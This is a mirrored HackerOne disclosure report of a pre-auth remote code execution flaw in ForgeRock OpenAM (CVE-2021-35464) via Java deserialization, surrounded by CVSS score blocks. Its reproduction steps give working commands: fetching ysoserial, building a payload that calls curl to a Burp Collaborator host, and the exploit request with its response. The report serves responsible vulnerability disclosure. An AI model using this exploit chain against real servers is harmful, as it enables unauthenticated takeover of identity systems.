Lucene search

K
hackeroneFdeleiteH1:1249456
HistoryJul 01, 2021 - 6:21 p.m.

U.S. Dept Of Defense: Pre-auth RCE in ForgeRock OpenAM (CVE-2021-35464)

2021-07-0118:21:48
fdeleite
hackerone.com
106

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

10 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

0.974 High

EPSS

Percentile

99.9%

RCE is possible thanks to unsafe Java deserialization in the Jato framework used by OpenAM.

Impact

An unauthenticated, 3rd-party attacker or adversary can execute remote code

Supporting Material/References

System Host(s)

β–ˆβ–ˆβ–ˆβ–ˆβ–ˆ

Affected Product(s) and Version(s)

CVE Numbers

CVE-2021-35464

Steps to Reproduce

Steps To Reproduce

Target domain: β–ˆβ–ˆβ–ˆβ–ˆβ–ˆ

First we need to build the payload:

  1. Download this jar file
    wget https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar

then
java -jar ysoserial-master-SNAPSHOT.jar Click1 "curl https://g0h7qcjzwzpzdh2ar6b5f9x3puvkj9.burpcollaborator.net" | (echo -ne \\x00 && cat) | base64 | tr '/+' '_-' | tr -d '=' | tr -d '\n' > payload.txt

You need to change the burp Collaborator id to test it properly.

The payload is now saved in the payload.txt file.

Now we need to use the following request:

GET /β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ=XYZ HTTP/1.1
Host: 127.0.0.1

Replace XYZ by the payload saved into the payload.txt file.

The response

HTTP/1.1 302 302
Date: Thu, 01 Jul 2021 18:11:52 GMT
Server: Apache
Set-Cookie: session=expiry=1625163712945691;Max-Age=600;path=/;HttpOnly;Secure;
X-Frame-Options: SAMEORIGIN
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Content-Security-Policy: default-src 'unsafe-inline' 'self'; script-src 'unsafe-eval' 'unsafe-inline' 'self' https://β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ; img-src 'self' https://β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ
Cache-Control: no-cache, private
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Cache-Control: private
Location: https://127.0.0.1:443/sso/base/AMInvalidURL
Content-Length: 0
X-XSS-Protection: 1; mode=block

The HTTP Request sent the collaborator :

β–ˆβ–ˆβ–ˆβ–ˆβ–ˆ

Suggested Mitigation/Remediation Actions

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

10 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

0.974 High

EPSS

Percentile

99.9%